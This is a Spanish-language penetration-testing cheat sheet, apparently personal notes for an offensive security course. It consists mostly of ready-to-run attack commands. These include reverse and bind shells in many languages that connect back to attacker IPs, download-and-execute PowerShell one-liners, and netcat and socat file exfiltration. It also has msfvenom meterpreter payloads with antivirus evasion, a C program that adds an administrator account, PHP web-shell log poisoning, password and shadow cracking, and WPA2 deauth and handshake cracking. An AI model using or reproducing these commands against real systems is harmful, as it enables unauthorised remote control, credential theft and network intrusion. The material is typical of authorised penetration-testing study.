MISC

Actualizar la shell a Full TTY

python -c 'import pty;pty.spawn("/bin/bash")'

Crear password para /etc/passwd

openssl passwd -1 -salt new 123 (123 es el pass)

Crear diccionario

Crear diccionario desde URL.

cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt #-m minimo de 6 letras.

Crear diccionario.

  • @ Minusculas
  • , Mayusculas
  • % Numericos
  • ^ Caracteres especiales.
crunch 8 8 -t ,@^%^ #minimo y maximo 8 letras, 

Transferir ficheros

Powercat File transfer

powercat -c 10.11.0.4 -p 443 -i C:\Users\Offsec\powercat.ps1
nc -lnvp 443 > receiving_powercat.ps1

Socat Transferir ficheros

socat TCP4-LISTEN:443,fork file:secret.txt
socat TCP4:IP:PUERTO file:received.txt,create

Netcat

En la maquina victima:
nc -w 3 IP PUERTO < out.file
En la maquina atacante:
nc -l -p 1234 > out.file

Powercat.

powercat -c IP -p PUERTO -i C:\fichero.txt nc -nlvp 443 > recibido.txt #En linux

WGET Powershell

echo $storageDir = $pwd > wget.ps1
echo $webclient = New‐Object System.Net.WebClient >> wget.ps1  
echo $url = "http://192.168.10.52:8000/evil.exe" >> wget.ps1
echo $file = "new-exploit.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >> wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

FTP

Enviar programas a la maquina victima para hacer transferencia de ficheros puede ser malo ya que el AV puede detectarlo. En nuestra maquina corremos un ftp server.

open 10.0.0.10 21 USER offsec mipassword bin GET nc.exe bye se ejecuta en windows ftp -v -n -s:ftp.txt

wget.vbs

https://gist.github.com/sckalath/ec7af6a1786e3de6c309

echo strUrl = WScript.Arguments.Item(0) > wget.vbs echo StrFile = WScript.Arguments.Item(1) >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs echo Err.Clear >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs echo http.Open "GET",strURL,False >> wget.vbs echo http.Send >> wget.vbs echo varByteArray = http.ResponseBody >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs echo strData = "" >> wget.vbs echo strBuffer = "" >> wget.vbs echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs echo Next >> wget.vbs echo ts.Close >> wget.vbs

After you've created wget.vbs

cscript wget.vbs http://192.168.10.5/evil.exe evil.exe

Powershell oneliner

powershell.exe (New-Object System.Net.Webclient).DownloadFile('http://10.10.14.15:8000/sherlock.ps1','sherlock.ps1')

Ejecutar ps1 sin descargarlo en disco: powershell.exe IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.14.15:8000/sherlock.ps1')

upx -9 nc.exe exe2hex -x nc.exe -p nc.cmd el resultado se pega en el windows, que pasara de hex a binario de nuevo.

Powershell file transfer

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')"

Powershell upload.

En la maquina linux:

En windows:

powershell (New-Object System.Net.Webclient).UploadFile('http://10.10.10.10/upload.php','evil.exe')

TFTP Upload

Instalar atftp en kali mkdir /tftp atftp --daemon --port 69 /tftp

en la maquina windows: tftp -i 10.10.10.10 put evil2.exe

crear windows meterpreter: msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=IP LPORT=PORT -f exe -o shell.exe

Despues de crear el payload: powershell "(New-Object System.Net.Webclient).Downloadfile('http://ip/file.exe','file.exe')"

Se ejecuta el multihandler: use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST IP set LPORT PUERTO y run

por ultimo se ejecuta: Start-Process "shell.exe" o desde cmd shell.exe


Usar Nishang en powershell para obtener una reverse shell:

powershell iex (New-Object Net.Webclient).DownloadString('http//IP/Invoke-PowershellTcp.ps1');Invoke-PowerShellTcp-Reverse -IPAddress IP -Port PUERTO

Pondriamos nc a la escucha.

Subir de una shell a meterpreter:

msfvenom -p windows/meterpreter/reverse_tcp lhost= lport= -f exe > writeup.exe​ ​ Y luego descargamos en la maquina objetivo con: powershell "(new-object System.Net.WebClient).Downloadfile('http:///writeup.exe', 'writeup.exe')"

Si el AV nos detecta el meterpreter, usar unicorn de trustedsec. Genera 2 ficheros, 1 rb con el handler y otro con el meterpreter encodeado.

Se ejecuta el handler con

msfconsole -r fichero.rb

Luego se ejecuta el siguiente comando que va a la web y ejecuta lo que haya en esa pagina (en esa pagina debe haber un exploit entendible por powershell, generado por unicorn).

powershell "IEX(New-Object Net.Webclient).downloadString('http://10.10.10.10/exploit.html')"

PORT FORWARDING

ssh local portforward

ssh –L 5901:10.10.10.48:4492 root@10.10.10.47

ssh remote portforward

ssh –R 9999:localhost:8080 root@10.10.10.48

RINETD

kali tiene internet pero el cliente debian no. kali puede conectarse por ssh al cliente debian.

En Kali. apt-get install rinetd /etc/rinetd.conf

Se edita el bindaddress 0.0.0.0 80 216.58.207.142 80 Todo el trafico recibido en el kali server en el puerto 80 sera redirigido a google.com(puerto 80). service rinetd restart

Se utiliza para conectar un cliente sin internet a internet utilizando kali para darle internet.

SSH Local Port Forwarding.

kali -> debian -> windows2016 445. Todo lo que se mande a kali en el puerto 445 se redirigira al server windows2016 a traves del puerto 22(ssh) del cliente debian. Debian tiene acceso al windows2016 pero kali no.

se ejecuta en kali ssh -N -L 0.0.0.0:445:IP_REMOTA:445 student@ssh_server

SSH Remote Port Forwarding

cliente (con mysql) -> kali

se ejecuta en el cliente. ssh -N -R KALI_IP:2221:127.0.0.1:3306 kali@IP

Esto hace que en la kali, todo lo que vaya al puerto 2221 ira al 3306 del cliente debian

SSH Dynamic Port Forwarding

Es como el ejemplo del local port forwarding pero sin estar limitado a una IP o puerto.

en kali se ejecuta ssh -N -D 127.0.0.1:8080 student@IP

nano /etc/proxychains.conf socks4 127.0.0.1 8080

proxychains nmap 192.168.1.1 ejecutaria nmap para escanear una maquina accesible por student pero no por kali directamente.

PLINK.EXE

En el studen(Windows) (Remote port forwarding). cmd.exe /c echo y | plink.exe -ssh -l kali -pw ilak -R IP_KALI:1234:127.0.0.1:3306 IP_KALI

hara que tengamos en nuestra kali, en el puerto 1234, lo mismo que el mysql del studen.

NETSH

netsh esta instalada por defecto en todas las versiones modernas de windows. Tiene que tener el servicio IP Helper ejecutandose y IPV6 habilitado (habilitado por defecto en windows). Se debe ser admin para poder ejecutarla sin que salte el UAC.

kali-> student -> windows2016(445)
En la maquina windows: netsh interface portproxy add v4tov4 listenport=4455 listenaddress=10.11.0.22 connectport=445 connectaddress=192.168.1.110 netsh advfirewall firewall add rule name="forward" protocol=TCP dir=in localip=10.11.0.22 localport=4455 action=allow

desde kali podremos acceder a student(4455) que se redirigira al windows2016(445).

HTTP Tunneling through deep packet inspection

apt-get install httptunnel

kali(htc --forward-port 8080 STUDENT_IP:1234) -> student(hts --forward-port localhost:8888 1234) y (ssh -L 0.0.0.0:8888:IPWINDOWS:3389 studen@127.0.0.1) -> Windows 2016 Si hacemos un RDP en kali al puerto 8080, se redigira al windows 2016 a por el tunel http a traves de la maquina student.

Socat Port Forwarding

Expone el puerto 8888 de localhost y lo redirige al puerto 8080 de localhost. socat tcp-listen:8888,reuseaddr,fork tcp:localhost:8080

Crackear ZIP

 fcrackzip -u -v -D -p /home/sml/rockyou.txt save.zip

Crackear Key SSH

ssh2john.py id_rsa > tocrack.txt
/usr/sbin/john --wordlist=rockyou.txt tocrack.txt

Exponer los ficheros via web del path donde se ejecute:

python -m SimpleHTTPServer

Crack Linux password

grep victim /etc/passwd > passwd-file.txt
grep victim /etc/shadow > shadow.file.txt
unshadow passwd-file.txt shadow-file.txt > unshadowed.txt
john --wordlist=diccionario unshadowed.txt

Reverse shell

Bash

bash -i >& /dev/tcp/192.168.1.2/443 0>&1
bash -c "bash -i >& /dev/tcp/192.168.1.2/443 0>&1"

Bash URL encoding

bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.1.2%2F443%200%3E%261%22

nc

nc -e /bin/sh 192.168.1.2 443
nc -e /bin/bash 192.168.1.2 443
nc -c /bin/sh 192.168.1.2 443
nc -c /bin/bash 192.168.1.2 443
nc.exe -e cmd 192.168.1.26 443
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.2 443 >/tmp/f

Perl

perl -e 'use Socket;$i="192.168.1.2";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Python

export RHOST="192.168.1.2";export RPORT=443;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.2",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.2",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

PHP

php -r '$sock=fsockopen("192.168.1.2",443);`/bin/sh -i <&3 >&3 2>&3`;'
php -r '$sock=fsockopen("192.168.1.2",443);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.1.2",443);system("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.1.2",443);passthru("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.1.2",443);popen("/bin/sh -i <&3 >&3 2>&3", "r");'
php -r '$sock=fsockopen("192.168.1.2",443);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.1.2",443);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'

Ruby

ruby -rsocket -e'f=TCPSocket.open("192.168.1.2",443).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.1.2","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
ruby -rsocket -e 'c=TCPSocket.new("192.168.1.2","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

AWK

awk 'BEGIN {s = "/inet/tcp/0/192.168.1.2/443"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

Golang

echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.1.2:443");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.1.2/443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Node

require('child_process').exec('bash -i >& /dev/tcp/192.168.1.2/443 0>&1');

Powershell

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("192.168.1.2",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.2',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.2:8000/reverse.ps1')

Powershell reverse shell

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.
11.0.4',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =
$stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.T
ext.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII
).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$c
lient.Close()"

nc -nlvp 443

Power shell bind shell

powershell -c "$listener = New-Object System.Net.Sockets.TcpListener(
'0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $clie
nt.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $byt
es.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString
($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$str
eam.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Sto
p()"

nc -nv IP PUERTO

Powercat reverse shell

nc -nlvp 443 #En linux
powercat -c IP -p PUERTO -e cmd.exe

Powercat bind shell

powercat -l -p PUERTO -e cmd.exe
nc -nv IP PUERTO #En linux

Powercat standalone payloads.

powercat -c IP -p PUERTO -e cmd.exe -g > reverseshell.ps1
.\reverseshell.ps1 #Puede ser detectada por IDS
nc -nlvp 443 #En linux
powercat -c IP -p PUERTO -e cmd.exe -ge > reverehell.ps1 #Encodea el fichero
nc -nlvp 443
powershell -E y se pega todo el contenido de reverseshell.ps1

Netcat Bind Shell

nc -nlvp 4444 -e cmd.exe

Netcat Reverse shell

nc -nlvp 4444 nc -nv IP PUERTO -e /bin/bash

Socat Reverse shell

socat -d -d TCP4-LISTEN:443 STDOUT
socat TCP4:IP:PUERTO EXEC:/bin/bash

Bind shell encriptada, se usa para evadir IDS.

openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -d days 365 #Se crea un certificado autofirmado (comando incompleto)
cat bind_shell.key bind_shell.crt > bind_shell.pem
socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash
socat - OPENSSL:IP:PUERTO,verify=0

Java Decompiler

java -jar jd-gui-1.6.6-min.jar

TCPDUMP

Muestra un fichero pcap.

tcpdump -r file.pcap 

Filtra por el destino

tcpdump -n dst host IP -r file.pcap 

Filtra por el puerto.

tcpdump -n port 81 -r file.pcap

Muestra el paquete en HEX y ASCII

tcpdump -nX -r file.pcap

Crear usuario y agregarlo al grupo administradores.

#include <stdlib.h>
int main ()
{
int i;
i = system ("net user evil Ev!lpass /add");
i = system ("net localgroup administrators evil /add");
return 0;
}

Compilar en Linux para windows.

i686-w64-mingw32-gcc adduser.c -o adduser.exe

Habilitar escritorio remoto windows.

Allow RDP connections (Get-WmiObject -Class "Win32_TerminalServiceSetting" -Namespace root\cimv2\terminalservices).SetAllowTsConnections(1)

Disable NLA (Get-WmiObject -class "Win32_TSGeneralSetting" -Namespace root\cimv2\terminalservices -Filter "TerminalName='RDP-tcp'").SetUserAuthenticationRequired(0)

Allow RDP on the firewall Get-NetFirewallRule -DisplayGroup "Remote Desktop" | Set-NetFirewallRule -Enabled True

Log poisoning

SSH

ssh '<?php system($_GET['cmd']); ?>'@192.168.1.2

HTTP

curl -s -H "User-Agent: <?php system(\$_GET['cmd']); ?>" "http://192.168.1.2"

WIRELESS

WPA2 PSK Proceso: 1) Poner la tarjeta en modo monitor. 2) Mirar informacion, canal, BSSID etc.. 3) Seleccionar la red de la cual capturar datos. 4) Hacer ataque DEAUTH.(opcional) 5) Capturar WPA hansdhake. 6) Crackear el handshake.

1) iwconfig #debe mostrar wlan0 airmon-ng check kill airmon-ng start wlan0 iwconfig #debe mostrar wlan0mon

2) Buscamos la informacion con el siguiente comando (BSSID,Canal,ESSID): airodump-ng wlan0mon

3) El comando empezara a tratar de capturar el handshake (Aparecen que estaciones estan conectadas.) airodump-ng -c 6 --bssid 50:9C:27:31:31:10 -w micaptura wlan0mon

4) Para hacer el DEAUTH (opcional): aireplay-ng -0 1 -a 50:C7:24:24:21:10 3C:F0:11:22:33:44 wlan0mon

-0 para el deauth 1 para 1 vez -a BSSID MAC de la STATION obtenida en el punto 3. interfaz

5) aircrack-ng -w wordlist.txt -b 50:C7:11:22:33:44 captura.cap La MAC es la del BSSID.